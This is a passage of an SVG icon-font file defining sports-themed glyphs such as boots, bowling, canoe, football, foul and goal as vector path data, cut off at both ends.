0-1-1-2-2z m-28 18c0-1 10-10 12-10 3 1 4 3 5 6-3 4-8 7-12 9-2 1-4-3-5-5z m-71 46c-2 5-8 5-13 7-3 1-4-3-4-5 2-6 9-4 13-7 3 0 5 4 4 5z m44-27c1-6 7-7 11-9 3-1 4 2 5 5-3 4-8 6-12 8-3 1-5-3-4-4z m-108 48c-1 8-8 5-13 7-2 1-3-2-3-4 1-8 8-4 12-7 4-1 5 2 4 4z m32-10c-1 8-8 5-12 7-4 1-4-2-4-4 1-7 8-5 12-7 2-1 5 2 4 4z m-127-32c-5 3-7 0-7-2 1-8 7-5 11-7 3-1 5 1 5 4 0 7-7 4-9 5z m169-42c1-6 6-8 10-10 2-1 4 2 6 5-4 3-8 7-12 9-1 1-5-3-4-4z m-67 44c-2 6-8 5-12 8-3-1-4-4-3-6 1-6 7-5 12-6 2-1 4 3 3 4z m-91 28c-1 5-7 3-10 5-4 1-6-1-6-4 1-8 8-4 11-6 4-2 5 2 5 5z m-49-25c0-8 7-5 10-6 4-2 6 0 6 3 0 8-7 3-10 6-3 0-6 2-6-3z m112 9c-4 5-9 4-13 6-4 1-4-3-4-5 1-6 7-4 11-6 4-2 3 3 6 5z m-32 8c0 7-7 3-9 6-4 1-7 0-6-4 0-7 7-4 10-6 4-2 5 2 5 4z m-18-34c1-6 7-5 11-7 4-1 4 2 6 6-3 3-8 4-12 5-3 1-5-1-5-4z m123-8c-2 1-5-3-4-5 2-5 7-6 11-9 3 2 5 4 4 6-2 5-7 7-11 8z m-167 54c0 7-6 4-9 5-3 0-7 1-7-4 1-7 7-3 11-5 3-1 5 1 5 4z m106-75c2-2 4-4 6-5 5-4 5 2 7 4-2 4-6 5-9 7-2 1-4 3-5 0-2-2-3-5 1-6z m-20 10c3 0 4 3 4 5-2 5-8 4-12 7-3 0-4-3-4-5 2-6 7-5 12-7z m61 14c2-1 4 3 4 5-1 5-7 5-10 8-4 0-6-3-5-4 1-6 7-6 11-9z" />
<glyph glyph-name="boot-alt-2" horiz-adv-x="1000" unicode="&#xed94;" d="M952 225h-930c-12 0-22-3-22-7l0-57c0-4 10-7 22-7h52l32-37 31 37h38l31-37 31 37h417l32-37 31 37 51 0 31-37 32 37h32l31-37 32 37 26 0c12 0 22 3 22 7l0 57c0 4-10 7-22 7z m-452 182h52l-101-150 63 0 71 95h55l-68-95 62 0 33 48 48-1-32-47 291 0s79 77-38 100c0 0-371 33-539 211 0 0-47 43-38-18-7-6-17-14-30-25-82-70-273 39-273 39-6 1-12 1-19-1-16-4-36-19-37-69v-237h394l106 150z" />
<glyph glyph-name="boot" horiz-adv-x="1000" unicode="&#xed95;" d="M675 349c-31 5-63 9-93 16-3 1-7 0-9-1-21-14-41-30-49-44-1-2-4-3-6-2l-26 10c-2 1-3 4-2 6 7 15 22 30 38 43 2 1 2 3-1 4-10 4-20 9-30 15-2 1-6 1-8 0-25-16-50-34-59-50-1-2-4-3-6-2l-26 10c-2 1-3 4-2 6 10 22 36 43 61 59 3 2 3 4 1 6-7 6-13 14-19 23-2 2-5 3-7 2-30-17-62-39-72-57-2-2-4-4-7-3l-25 11c-3 0-4 3-3 5 15 31 59 59 90 76 2 1 3 4 2 7-12 30-21 71-22 127l-1 34c0 3-2 5-5 5h-287c-2 0-4-2-4-5v-313c0-2-1-6-1-9l-33-148c-1-2-1-6-1-9l0-121c0-3 2-5 4-5h302c3 0 5 2 5 5v34c0 3 2 5 4 5h111c2 0 5-2 7-4l23-36c2-2 5-4 8-4h398c2 0 5 2 5 5l4 30c13 102-10 172-71 215-50 35-117 45-188 54z" />
<glyph glyph-name="bowling-alt" horiz-adv-x="1000" unicode="&#xed96;" d="M211 408c-45-1-90-1-135 0-19 1-26-7-32-24-53-142-59-286-14-431 18-58 19-58 80-58h32c15 0 29 2 43 0 44-10 60 14 71 51 46 148 41 294-12 439-6 17-14 24-33 23z m-67 171c63 0 62 2 80 62 12 37 17 73 0 110-16 33-38 56-78 57-44-1-66-24-81-57-18-37-12-73-1-110 18-60 18-62 80-62z m67-53h-137c-5 0-9-4-9-10l-4-28c-1-7 4-14 9-14h146c6 0 10 8 9 15l-5 28c-1 5-5 9-9 9z m359-118c-45-1-90-1-135 0-20 1-27-7-33-24-52-142-58-286-13-431 18-58 19-58 80-58h32c14 0 29 2 43 0 44-10 60 14 71 51 45 148 41 294-12 439-6 17-14 24-33 23z m-67 171c62 0 62 2 80 62 12 37 17 73 0 110-16 33-38 56-78 57-44-1-66-24-82-57-17-37-11-73 0-110 18-60 18-62 80-62z m67-53h-138c-4 0-8-4-8-10l-4-28c-1-7 3-14 9-14h146c6 0 10 8 9 15l-5 28c-1 5-5 9-9 9z m387-141c-6 17-14 24-33 23-45-1-90-1-135 0-19 1-27-7-33-24-52-142-58-286-13-431 18-58 19-58 80-58h32c14 0 29 2 43 0 44-10 60 14 71 51 45 148 41 294-12 439z m-100 194c62 0 62 2 80 62 12 37 17 73 0 110-16 33-38 56-78 57-44-1-66-24-82-57-17-37-11-73 0-110 18-60 18-62 80-62z m67-53h-137c-5 0-9-4-9-10l-4-28c-1-7 3-14 9-14h146c6 0 10 8 9 15l-5 28c-1 5-5 9-9 9z" />
<glyph glyph-name="bowling" horiz-adv-x="1000" unicode="&#xed97;" d="M500 850c-276 0-500-224-500-500 0-276 224-500 500-500 276 0 500 224 500 500 0 276-224 500-500 500z m-124-463c-41 0-75 34-75 76 0 41 34 75 75 75 42 0 75-34 75-75 0-42-33-76-75-76z m75 236c0 49 40 88 88 88 49 0 88-39 88-88 0-48-39-88-88-88-48 0-88 40-88 88z m164-343c-50 0-91 40-91 90 0 50 41 90 91 90 50 0 90-40 90-90 0-50-40-90-90-90z" />
<glyph glyph-name="canoe" horiz-adv-x="1000" unicode="&#xed98;" d="M220 109c8-3 13 3 19 9 30 31 61 61 92 92 6 5 6 8 0 14-110 113-202 240-274 380-23 44-42 89-52 137-5 21-7 42-2 64 7 26 24 41 52 44 38 4 74-6 109-19 84-31 160-77 234-126 82-55 159-116 229-185 5-5 8-5 13 0 29 29 58 58 88 88 3 3 5 7 4 13-2 13 1 26 6 38 24 67 64 123 119 168 24 20 43 19 68 0 16-11 30-25 42-42 16-23 16-40-1-63-15-20-33-38-52-54-39-31-81-58-129-71-8-2-17-4-25-3-7 1-11-1-15-6-43-43-86-86-129-129-120-120-240-240-360-359-6-6-9-12-8-21 1-18-6-36-13-52-25-56-59-104-105-144-6-5-12-10-20-14-14-8-29-8-43 0-25 15-44 34-59 58-11 17-9 35 2 51 14 20 31 37 49 53 38 32 79 59 127 74 10 4 21 6 34 5z m121 362c0-6 1-14 4-22 15-52 44-96 79-137 4-6 6-2 10 1 34 34 69 69 103 103 5 5 5 8 0 12-29 25-61 46-95 62-20 10-41 18-64 20-25 1-38-12-37-39z m320-241c-1 18-9 40-19 61-14 27-30 53-49 77-4 6-4 9 1 13 26 26 52 53 78 79 5 4 7 6 12 0 111-126 209-261 280-415 18-38 33-79 36-122 1-10 0-19-2-29-7-31-32-47-70-44-43 4-84 19-123 36-101 45-193 106-281 172-46 33-90 69-132 107-6 5-7 8-1 14 26 26 52 52 78 78 5 5 8 5 13 1 37-28 75-53 120-65 8-2 15-4 24-4 24 0 35 11 35 41z" />
<glyph glyph-name="cheer-leader" horiz-adv-x="1000" unicode="&#xed99;" d="M578 207l-71 46c-2-28-4-53-5-78-3-99-6-199-10-298 0-10 6-25-16-27-22-1-27 8-30 27-19 129-39 258-58 388-2 14-6 20-20 19-13-2-12 5-8 14 15 36 31 71 46 107 3 6 7 14 6 20-5 37-12 74-18 111-1 6-6 9-11 12-34 22-68 43-102 66-11 8-17 6-20-6-4-18-14-24-31-18-19 7-30-9-42-17-8-5-13-6-18 1-9 16-23 18-40 14-15-4-26 0-28 18-2 17-17 19-29 24-13 5-21 11-14 26 9 17-3 28-12 39-9 10-12 19 1 28 15 11 12 26 9 42-2 9-3 19 10 20 20 3 29 16 34 33 3 11 8 20 22 12 18-9 30 2 41 13 10 8 19 11 28-1 11-15 26-14 41-10 13 4 22 2 23-14 2-18 16-24 30-28 14-5 20-12 14-27-8-16 3-27 12-37 9-11 11-18-1-30-19-18-18-24 7-36 15-8 30-16 45-24 10-6 13-5 16 7 9 35 17 70 25 106 8 43 28 59 71 61 48 3 73-11 87-53 14-41 18-84 28-126 1-3 1-5 3-10 33 18 66 35 99 53 10 5 5 10 0 15-15 15-14 27 3 40 11 9 5 21 3 32-3 14 0 25 17 26 19 2 21 19 27 32 4 11 9 18 23 11 17-9 29 3 41 13 10 9 19 10 27-2 10-14 25-13 39-9 15 4 24 1 26-16 1-18 16-22 29-26 14-5 21-11 13-27-7-15 3-27 12-37 10-11 14-20 0-30-12-8-14-19-10-33 5-17 2-30-18-32-19-2-19-19-25-30-4-8-7-18-18-13-23 12-36-4-52-15-4-3-8-10-13-2-13 18-30 22-50 17-14-3-21 1-23 16-4 26-20 26-38 14-33-23-67-45-101-67-10-7-15-15-17-27-4-24-8-47-12-71-3-18-4-34 6-51 9-16 16-33 22-50 15-49 41-90 81-121 12-10 10-17 1-28-46-56-92-113-138-169-4-6-8-18-16-13-8 5-17 16-13 26 15 45 21 91 40 134 4 10 11 17 20 26z m-318 508c-23 8-11 32-23 38-16 7-23 34-48 23-1-1-2 1-3 2-20 14-32-15-50-9-2-18-32-24-22-48 2-7-15-13-6-20 13-12 3-41 30-43 1 0 2-4 3-6 4-5 43-18 47-14 13 13 41 5 44 31 28 6 2 37 28 46z m564-82c11 13 25 15 39 17 1 0 2 3 3 5 6 16 30 24 20 47 0 0 2 2 3 3 3 5-6 47-10 48-18 4-24 33-49 23-1-1-3 2-5 3-5 2-47-7-48-12-5-17-33-23-23-48 2-5-13-11-6-18 14-12 4-41 31-43 5-29 37-2 45-25z m-280-37c-7 3-9 4-11 6-21 12-24 26-10 45 11 15 17 32 17 51 0 8-2 13-12 13-28 0-56 0-85 0-8 0-12-3-12-10 1-17 1-33 10-48 18-31 18-32-14-54 44-7 51-44 63-77 21 23 16 61 54 74z" />
<glyph glyph-name="climbing" horiz-adv-x="1000" unicode="&#xed9a;" d="M354 725c0 46 37 83 83 83 46 0 84-37 84-83s-38-83-84-83c-46 0-83 37-83 83z m292-250v-42c10 0 250 5 250 417h-42c0-371-200-375-208-375z m100-87c-13 6-28 5-40-3l-68-46c-48-24-117-52-201-60-14-1-28-7-35-20l-84-138c-1-1-2-4-3-6l-83-208c-8-22 2-46 23-54 5-2 11-3 16-3 16 0 32 10 39 26l82 205 2 5c39 19 114 57 156 93l13 6v-335h41v357c37 19 70 41 95 59l31-213c2-21 20-36 41-36 2 0 4 0 6 0 23 3 38 25 35 47l-42 292c-2 14-11 26-24 32z m-504 47l113 37 49-155c121 0 196 54 196 54l-20 177 117 75c8 5 14 13 17 21l54 150c8 22-3 46-25 54-22 7-45-4-53-25l-49-137c-1-1-387-159-387-159l-4-1-67 134c-10 21-35 29-56 19-20-10-29-35-18-56l83-167c7-14 22-23 37-23 4 0 9 1 13 2z" />
<glyph glyph-name="corner" horiz-adv-x="1000" unicode="&#xed9b;" d="M803 539c54 0 98 44 98 99 0 54-44 98-98 98-54 0-99-44-99-98 0-55 45-99 99-99z m60 142c0 3 0 5 0 6 2 1 9 0 15-1 2-1 4-1 5-1 7-11 11-24 12-38-1-1-2-2-4-4-4-4-9-9-11-10-1 2-3 4-4 6-4 5-9 11-13 15-1 2-2 3-2 3 0 4 1 16 2 24z m-2-86c3 1 6 2 7 2 0-2 1-9 3-15 0-2 0-4 1-5-9-10-20-18-33-24-1 1-3 2-5 3-5 3-12 6-13 7 2 2 3 4 5 7 4 7 11 18 12 19 0 0 14 4 23 6z m-81 130c1 2 2 4 3 5 6 1 13 2 19 2 7 0 14-1 20-2 1-1 2-3 3-5 3-5 6-12 7-13-3-1-5-2-8-3-6-3-15-6-19-7-1-1-2-1-2-1 0 0-1 0-2 1-4 1-13 5-20 7-2 1-5 2-6 3 0 1 3 8 5 13z m21-57c1 1 2 1 2 2 0-1 1-1 2-2 7-5 26-18 27-19-1-5-11-33-12-35h-35c-1 2-10 30-11 34 1 2 20 15 27 20z m-31-82c3-4 7-12 10-17 2-2 3-4 4-5-1-2-7-5-13-8-1-1-3-2-5-3-12 5-23 13-32 22 1 2 1 4 1 6 1 6 2 12 3 15 1 1 3 0 6-1 7-2 21-5 23-6 1 0 2-2 3-3z m-45 47c-2 2-7 7-11 11-2 2-3 3-4 4 1 13 5 26 11 37l6 1c6 1 14 2 16 2 0 0 0-3 0-6 1-8 1-21 2-24 0-1-1-2-3-4-3-4-9-11-13-16-2-3-3-5-4-5z m247 212h-945c-36 0-36-57 0-57h481c3-74 27-150 62-214 77-141 218-210 374-222v-469c0-36 56-36 56 0v933c0 16-13 29-28 29z m-28-436c-144 11-268 77-333 209-26 52-44 112-47 170h380v-379z" />
<glyph glyph-name="field-alt" horiz-adv-x="1000" unicode="&#xed9c;" d="M0 657v-614h1000v614h-1000z m966-580h-932v546h932v-546z m-555 273c0-44 33-81 75-88v176c-42-7-75-44-75-88z m387 101h95v-202h-95v202z m-287-13v-176c44 6 78 43 78 88 0 45-34 82-78 88z m-401 13h95v-202h-95v202z m376-223c-61 8-109 59-109 122 0 63 48 114 109 121v115h25v-114c63-6 112-58 112-122 0-64-49-116-112-122v-114h413v101h-160v270h160v101h-848v-101h163v-270h-163v-101h410v114z" />
<glyph glyph-name="field" horiz-adv-x="1000" unicode="&#xed9d;" d="M486 16c-1 62 0 124 0 186 0 13-3 18-16 22-63 17-100 66-100 126 1 61 39 110 101 126 10 3 15 6 15 18 0 63-1 127 0 190 0 14-5 18-18 17-75 0-149 0-223 0s-148-1-222 1c-19 0-23-6-23-24 1-37 2-75 0-112-1-18 6-22 22-22 36 2 72 0 108 1 13 0 17-4 17-17 0-119 0-238 0-357 0-14-5-17-17-17-38 1-75 0-113 1-13 0-17-5-17-17 1-42 1-83 0-124 0-16 8-16 19-16 149 1 299 1 449 0 14 0 18 4 18 18z m272 685c-75 0-149 0-224 0-14 1-19-3-19-17 1-62 1-124 0-186 0-13 4-19 19-23 57-14 98-68 98-126 0-57-42-111-99-125-14-3-18-8-18-21 1-62 1-124 0-185 0-15 4-20 20-20 37 1 75 2 112 1 111 0 222 0 332-1 16 0 22 3 21 20-1 39-1 78 0 117 1 17-6 20-21 20-35-1-70 0-105-1-15 0-21 3-21 19 1 118 1 236 0 355 0 15 7 17 19 17 36-1 72 0 108 0 14-1 20 2 20 18-1 40-1 80 0 119 0 16-4 20-19 20-75-1-149-1-223-1z m-640-502c0 101 0 201 0 302 0 12-3 16-15 16-28-1-55-1-83 0-17 1-20-6-20-21 1-49 1-98 1-147 0-49 0-99-1-148 0-14 4-19 18-19 28 1 55 1 83 0 12 0 17 4 17 17z m781 318c-12 0-15-4-15-16 0-101 0-202 0-303 0-14 6-16 18-15 27 0 53 1 80-1 15 0 18 5 18 19-1 49 0 99 0 149 0 49-1 99 0 149 0 13-4 18-18 18-28-1-55-1-83 0z m-413-83c0 14-4 15-16 12-40-13-71-53-71-97 0-42 31-82 71-95 15-5 16 1 16 13-1 28 0 55 0 83 0 28 0 56 0 84z m43-181c40 10 72 51 72 95 0 46-30 87-71 98-11 4-15 2-15-11 1-28 1-56 1-84 0-29 0-58 0-87 0-10 1-14 13-11z" />
<glyph glyph-name="football-alt" horiz-adv-x="1000" unicode="&#xed9e;" d="M500 850c-276 0-500-224-500-500 0-276 224-500 500-500 276 0 500 224 500 500 0 276-224 500-500 500z m-114-58c5 10 10 19 13 26 32 7 65 11 98 11 34 0 67-4 99-11 4-7 9-16 14-26 15-27 33-59 37-66-2 0-4-1-7-3-8-3-19-7-32-12-33-13-77-30-97-38-7-2-11-4-11-4-1 0-5 2-12 4-20 8-65 26-98 39-14 5-26 9-32 12-3 1-5 2-6 2 4 7 20 40 34 66z m-260-442c-10-13-18-22-20-25-9 9-36 35-58 56-8 8-16 15-21 20 6 67 27 131 59 187 7 1 18 3 29 5 31 5 70 12 78 13 1-4 2-17 3-33 3-42 7-106 8-121 0-2 0-3 0-3 0-1-5-7-12-16-17-21-46-58-66-83z m214-416c-10-6-19-10-26-14-62 26-117 65-162 113 1 7 3 17 5 29 4 28 10 62 12 76 0 2 1 4 1 5 3-1 14-4 29-8 40-11 107-29 121-33 1 0 2-1 2-1 1-1 5-7 11-16 13-21 36-57 53-84 7-12 14-22 17-28 2-3 3-4 4-6-7-3-39-20-67-33z m247 295h-179c-3 9-49 152-57 174 0 1 0 2 0 2 7 5 104 74 137 98 6 4 10 7 12 8 1-1 5-4 11-8 34-24 131-93 138-98-1 0-1-1-1-1-7-23-54-166-57-175h-4z m98-308c-8 4-17 9-27 14-28 14-59 29-66 32 1 2 3 4 5 7 4 7 10 17 18 29 24 39 60 95 62 98 4 1 74 20 118 32 16 5 29 8 34 9 2-7 9-44 14-75 2-10 4-20 5-28-45-50-101-90-163-118z m208 404c0 1-1 2-2 3-5 6-13 15-22 27-19 25-46 58-62 78-7 9-11 15-12 16 0 0 0 1 0 3 1 15 5 74 8 115 1 15 2 27 2 34 1 2 1 4 1 5 8-1 43-7 74-12 11-2 21-4 29-5 32-58 53-123 59-192-5-5-13-12-21-20-22-21-48-47-54-52z" />
<glyph glyph-name="football-american" horiz-adv-x="1000" unicode="&#xed9f;" d="M314 64c2-6 6-9 13-9 41 1 81-1 122 3 72 6 141 26 204 63 71 41 130 95 181 160 5 6 6 11 2 18-25 56-50 112-75 168-25 56-50 112-75 168-3 7-7 11-14 10-36 0-73 2-109-1-77-6-150-26-217-64-71-42-130-97-181-161-4-6-5-10-2-17 50-112 101-225 151-338z m49 279c5-10 9-20 14-31 14 6 27 12 42 19l-14 31c9 4 17 7 26 11 5-10 9-20 14-31 14 7 27 13 42 19-5 10-9 20-14 31 9 4 17 8 27 12 4-10 9-21 14-31 14 6 27 12 41 18-5 10-9 20-14 31 9 4 17 8 27 12 4-10 9-20 14-31 14 7 27 13 42 19-5 10-10 20-14 31 9 4 17 8 26 12 13-30 26-60 40-90-8-4-16-7-25-12l-14 31c-15-6-28-12-42-19 4-10 9-20 13-31-9-4-17-7-26-11-5 10-9 20-14 31-14-7-27-13-42-19l14-31-26-12c-5 11-9 21-14 31-14-6-28-12-42-18 5-11 9-21 14-31l-26-12c-5 10-9 20-14 31-14-7-28-13-42-19 4-10 9-20 14-31-10-4-18-8-27-12-13 30-26 60-40 90 8 4 17 8 26 12z m572 140c9 45-6 80-46 102-25 14-52 25-79 35-14 6-29 8-46 13 41-93 81-183 122-275 23 41 41 81 49 125z m-848-349c16-13 33-24 51-34 30-16 63-25 98-32-41 92-82 182-123 275-8-17-16-31-23-46-15-34-27-69-27-107-1-22 6-42 24-56z" />
<glyph glyph-name="football" horiz-adv-x="1000" unicode="&#xeda0;" d="M187 336l138-1c4 0 8-2 10-5l70-119c1-2 1-7 0-10l-68-118c-2-3-6-5-10-5l-138 0c-3 0-7 2-9 5l-70 119c-2 3-2 8 0 10l68 118c2 3 6 6 9 6z m489 1l138 0c4 0 8-3 9-6l71-118c1-3 1-8 0-11l-69-118c-1-3-5-5-9-5l-138 0c-3 0-8 3-9 6l-70 118c-2 3-2 8-1 11l69 118c1 3 5 5 9 5z m-10 33l-71 117c-1 3-1 7 0 10l67 120c2 3 6 5 9 5l139 3c3 0 7-3 9-6l71-117c2-3 2-7 0-10l-67-120c-2-3-6-5-9-5l-138-3c-4 0-8 3-10 6z m-246 137l-71 117c-2 3-2 8-1 11l67 119c2 3 6 6 10 6l138 2c3 0 7-2 9-5l71-117c2-3 2-8 0-11l-67-119c-1-3-5-6-9-6l-138-2c-3 0-8 2-9 5z m-242-142l-71 117c-2 3-2 7-1 10l68 120c1 3 5 5 9 5l138 3c3 0 8-3 9-6l71-117c2-3 2-7 1-10l-68-120c-1-3-5-5-9-5l-138-2c-3-1-8 2-9 5z m-115-15c0-242 195-438 437-438s438 196 438 438c0 242-196 438-438 438s-437-196-437-438z m367-154l138 0c4 0 8-2 9-5l71-119c1-3 1-8 0-11l-69-118c-1-3-5-5-9-5l-138 1c-3 0-8 2-9 5l-70 119c-2 2-2 7 0 10l68 118c1 3 6 6 9 5z" />
<glyph glyph-name="foul" horiz-adv-x="1000" unicode="&#xeda1;" d="M992 442c-37 2-74 5-111 7-2 0-5 0-7 1 1 4 0 11 1 13 4 17 2 37 3 54 1 6-7 11-12 8-10-8-20-15-30-22-12-8-28-13-23-19-15 13-28 53-36 68-5 8-15 4-16-4l-4-63c-1-10 16-10 17 0 1 12 1 23 2 34 9-16 18-32 27-48 2-4 7-6 11-3 16 10 31 21 46 32-1-19-2-39-3-59-1-4 4-8 8-8 30-2 59-4 89-6l-82-32c-6-3-8-9-4-14 14-17 28-33 42-49-24 1-48 3-71 4-5 1-8-4-8-8-1-16-2-32-2-48l-17 35c-5 9-19 1-14-9l31-65c3-8 15-3 15 4l2 42c0 14 6 34-1 34 20 6 66-6 84-7 8-1 10 9 6 14-16 19-31 37-47 55 35 14 71 28 106 42 9 4 8 16-2 17z m-178-37c-1 14-11 24-25 25-44 2-88 4-133 6-54 2-109 4-163 6-12 1-21 7-25 18-5 11-3 23 7 31 18 17 37 32 55 49 5 5 9 13 11 20 3 11-2 21-11 27-10 7-20 7-29 1-15-8-29-17-43-25-56-33-112-65-168-98-21-12-31-29-31-54 0-21 0-43 0-64v-60c0-40 18-60 57-65 50-6 99-13 149-20 26-4 49 9 60 34 16 38 32 75 48 112 3 8 8 11 16 12 61 4 122 9 183 13 7 1 15 1 22 3 14 3 22 16 20 29z m-599 72h-215v-364c18-4 33-5 45-5 12 0 27 1 45 5v143h99c3 15 4 28 4 40 0 11-1 24-4 40h-99v62h125c3 15 4 29 4 40 0 6 0 12-1 18-1 7-2 14-3 21z m-16-293c-3 4-8 7-13 9-5 2-11 3-18 3-7 0-13-1-18-3-5-2-9-5-13-9-3-4-6-8-8-14-1-5-2-11-2-18 0-6 1-12 2-17 2-6 5-10 8-14 4-4 8-7 13-9s11-3 18-3c7 0 13 1 18 3s10 5 13 9c4 4 6 8 8 14 2 5 3 11 3 17 0 7-1 13-3 18-2 6-4 10-8 14z m-20-47c-3-4-6-6-11-6-5 0-8 2-10 6-3 3-4 8-4 15 0 7 1 12 4 16 2 4 5 5 10 5 5 0 8-1 11-5 2-4 3-9 3-16 0-7-1-12-3-15z m104 59c-2 0-4-1-7-1-2 0-4 0-7-1v-61c0 0-1 0-2 0s-2 0-4 0c-4 0-8 1-10 3s-3 7-3 13v45c-2 1-5 1-7 1-2 0-5 1-7 1-2 0-4-1-6-1-3 0-5 0-7-1v-47c0-8 1-15 3-20 2-5 5-9 9-11 4-3 8-5 14-5 5-1 10-2 15-2 3 0 6 0 9 1 3 0 6 0 9 1 3 1 5 1 8 2 2 1 5 1 6 2v79c-2 1-4 1-6 1-3 0-5 1-7 1z m89-62h-30l0 60c-2 1-5 1-7 1-2 0-5 1-7 1-2 0-4-1-6-1-3 0-5 0-7-1l-1-83h58c1 2 1 4 1 6 0 2 0 4 0 5 0 2 0 4 0 6s0 4-1 6z" />
<glyph glyph-name="goal-keeper" horiz-adv-x="1000" unicode="&#xeda2;" d="M983 427c-21 24-41 19-62 0-17-16-34-29-51-44-25-21-33-11-32 17 0 65 0 130 2 196 1 23 6 47-26 51-33 4-37-18-42-45-8-41 0-84-22-137-10 60-19 105-16 152 1 30-14 45-44 42-30-2-27-22-26-44 1-41 15-82 1-133-14 40-24 71-36 101-7 16-10 39-38 29-27-11-32-28-22-54 15-35 28-72 45-117-26 19-30 40-40 57-10 18-19 32-44 18-23-13-27-27-14-50 23-39 36-83 39-127 4-54 15-106 38-154 8-15 7-24-5-40-23-30-9-51 28-52 33-1 66 0 98 1 41 1 96-16 86 59-1 4 4 10 8 13 74 50 93 149 174 194 27 15 20 44 1 67z m-238-235c-14-3-28-3-41-4-49-7-75 16-86 61-2 10-7 19-9 29-21 103 35 161 139 145 11-2 26-3 25-14-3-46 34-73 52-108 16-34-34-100-80-109z m28-114c-48 1-97 1-145 0-11 0-26 2-25-16 1-13 8-24 23-24 24-1 48 0 72 0 26 0 51-1 77 1 14 0 21 11 20 25 0 15-12 14-22 14z m-358 355c-11-10-23-21-35-30-13-9-24-31-43-22-15 8-7 28-7 43 0 64 0 127 0 191 0 23-12 34-35 36-25 1-24-16-29-33-11-44-1-91-23-140-22 53-12 102-21 149-5 23-10 39-39 35-29-4-32-21-30-44 5-42 8-84 12-126-19 23-27 48-38 72-11 22-7 64-50 49-40-14-18-44-9-69 9-25 18-50 27-75l-10-4c-5 8-10 17-15 26-10 20-17 44-49 29-32-15-21-37-10-60 19-35 29-73 33-113 5-55 13-109 40-159 7-13 10-23-4-39-23-28-10-49 28-50 38-1 76 0 113 0 37 0 82-11 69 53-1 5 4 14 9 18 74 51 93 149 174 194 28 16 18 45 0 67-19 23-38 20-58 2z m-155-352c-22 1-45 0-67 0-24 0-48 0-72 0-11-1-26 3-27-15 0-14 9-25 21-26 50-1 100-1 149 1 13 0 22 12 22 24 1 19-15 16-26 16z" />
<glyph glyph-name="goal" horiz-adv-x="1000" unicode="&#xeda3;" d="M997 533c7 7 0 17-8 18l-91 5c18 45 36 89 55 134 4 11-8 21-17 12-35-31-70-63-104-95-2-2-5-3-7-5-4 5-10 10-12 12-11 18-31 35-46 51-5 5-17 2-18-5l-7-46c-2-19-12-39 0-39-24-2-74 22-96 28-11 3-17-11-10-18l54-59c9-10 24 5 15 15-10 11-19 21-29 32 22-6 45-12 67-18 6-2 12 2 13 8l11 71c17-19 33-37 50-55 4-5 11-4 15 0 28 25 56 51 84 76-14-34-29-69-43-103-3-8 1-16 10-16l81-5c-22-20-44-40-66-60-5-4-4-12 0-15 14-15 28-30 43-45l-47 16c-13 4-18-17-5-21 29-9 58-19 87-28 10-4 16 11 9 18-12 12-24 25-36 37-13 14-27 40-33 28 10 23 63 56 81 72z m-76-508c-21-1-41 0-62-1-10 0-14 2-14 14 1 138 1 277 1 415 0 33-8 41-41 41-200 0-400 0-600 0-28 0-56 0-83-1-20 0-30-11-31-31 0-22 0-43 0-64 0-120 0-239 1-359 0-11-3-15-15-15-21 1-42 0-63 1-14 1-13-6-14-16-1-13 5-15 15-15 151 0 302 0 453 0 151 0 302 1 453 0 14 0 16 4 16 17 1 14-6 14-16 14z m-133 393c-7 6-13 12-18 17 20 4 20 4 18-17z m-16-4c7-8 19-13 16-26 3-13-8-18-15-25-17-18-17-17-34-1-8 9-21 16-23 26-1 10 14 17 22 25 17 19 17 19 34 1z m17-54v-46c-30 28-30 20 0 46z m-45 77c-14-14-25-26-37-37-3-3-5 0-7 2-11 10-22 21-36 35h80z m-91-8c2-1 4-2 5-3 11-11 23-23 34-34 4-4 1-7-2-10-10-10-21-20-31-31-4-4-7-5-11 0-11 11-22 22-32 32-4 3-5 6-1 10 11 11 22 22 33 33 1 1 3 2 5 3z m-12 7c-13-13-24-24-35-36-3-2-6-1-8 1-11 11-23 22-37 35h80z m-88-7c1-1 2-3 4-5 6-5 12-11 18-17 18-19 18-19-1-38-23-24-23-24-46 0-19 19-19 19 0 38 5 6 11 12 16 17 2 2 4 5 9 5z m-89 7h70l2-3c-11-10-22-20-33-31-4-4-7-2-10 1-10 10-21 20-31 30l2 3z m-102 1h71c-10-14-22-24-33-35-2-3-5-3-7 0-12 10-23 20-34 31l3 4z m-12-10c11-11 23-23 35-35 0 0 1-1 2-3-2-2-4-4-5-6-11-10-21-21-31-31-4-4-7-5-11 0-10 10-20 20-31 30-4 5-5 8 0 12 11 11 21 22 32 32 3 3 5 5 9 1z m-90 9h74c-13-13-24-24-36-35-3-3-5-2-8 1-11 10-22 20-33 31l3 3z m-6-15c6-7 13-12 19-18 13-14 13-14 0-28-7-7-15-15-23-22-2-2-4-4-7-6-3 3-6 6-9 8-10 11-28 21-29 33-1 12 19 21 28 33 8 9 14 10 21 0z m-26 15l3-4c-11-10-22-20-34-30-3-3-5-3-8 0-11 10-23 20-34 34h73z m-79-16c2-1 3-1 4-2 34-31 34-33-4-63v65z m-1-307l4 4c9-10 18-20 27-30 4-5 2-7-2-11-9-8-17-18-29-30v67z m78-88c-25-1-51 0-80 0 16 16 29 30 42 44 5 4 7 1 10-2 11-10 21-21 32-32 6-6 3-10-4-10z m17 15c-2 1-3 2-4 4-2 1-3 2-5 4-10 11-31 22-29 33 3 14 21 24 33 37 4 4 7 5 12 0 10-11 20-21 30-31 3-3 7-6 2-10-11-12-23-23-35-35-1-1-3-1-4-2z m92-12c-1-2-4-3-7-3-11 0-22 0-32 0-11 0-22 0-33 0-3 0-7 0-8 4-2 3 1 5 3 7 10 10 21 20 31 31 4 4 6 5 11 0 10-11 21-21 32-32 2-2 5-3 3-7z m-25 47c-3 2-7 5-3 9 12 13 25 25 38 37 0 1 2 0 4 0 10-11 20-22 32-33 7-6 6-11-1-16 0 0 0 0-1-1-11-10-22-21-32-31-14 10-25 23-37 35z m126-47c-1-4-4-3-7-3-11 0-22 0-32 0-11 0-22 0-33 0-3 0-6 0-7 3-2 3 1 5 3 7l32 33c3 3 6 3 9-1 11-11 22-21 32-32 2-2 5-4 3-7z m103 0c-2-3-5-3-8-3-11 0-22 0-33 0-11 0-22 0-32 0-4 0-7 0-8 3-1 3 2 5 4 6 11 11 22 22 32 34 4 3 6 3 10-1 10-11 21-21 32-32 2-2 4-4 3-7z m5 17c-11 13-33 23-31 37 1 13 21 25 33 37 3 3 6 5 9 1 12-11 24-23 36-35 1-1 1-2 2-4-2-2-3-3-5-5-10-10-21-20-31-31-5-5-8-5-13 0z m98-16c-1-4-6-4-10-4-10 0-20 0-30 0-11 0-21 0-32 0-4 0-7 1-8 4-1 4 2 5 4 7 10 10 20 20 29 30 5 6 9 6 14 0 9-10 19-19 